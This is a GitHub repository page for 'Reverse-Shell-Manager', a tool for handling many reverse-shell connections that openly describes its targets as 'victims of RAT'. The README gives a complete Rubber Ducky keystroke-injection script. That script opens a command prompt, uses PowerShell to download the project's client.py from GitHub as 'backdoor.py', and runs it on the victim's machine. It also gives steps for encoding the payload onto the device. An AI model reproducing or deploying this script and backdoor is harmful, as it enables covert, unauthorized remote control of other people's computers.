Skip to content

Generally, a port can only be connected to one client. This project excludes that policy and makes 'N' number of clients be able to connect to single port. This can easily be used to manage all the victims of RAT.

Notifications You must be signed in to change notification settings

VishnuChebolu/Reverse-Shell-Manager

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Reverse-Shell-Manager

We need to run client.py file in victim's machine to execute the payload. So I used rubber ducky here to transmit the malware.

ducky script:

DELAY 1000
GUI r
ENTER
DELAY 100
STRING cmd
ENTER
DELAY 1000
STRING pip install rsa pyautogui && powershell -c "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/VishnuChebolu/Reverse-Shell-Manager/main/client.py' -OutFile 'c:\Users%username%\Desktop\backdoor.py'" && cd Desktop &&python backdoor.py
ENTER

The above script just download client.py file from github and execute it.

Go to https://shop.hak5.org/pages/ducky-encoder to encode the payload into bin file and insert the bin file in the rubber ducky.

About

Generally, a port can only be connected to one client. This project excludes that policy and makes 'N' number of clients be able to connect to single port. This can easily be used to manage all the victims of RAT.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages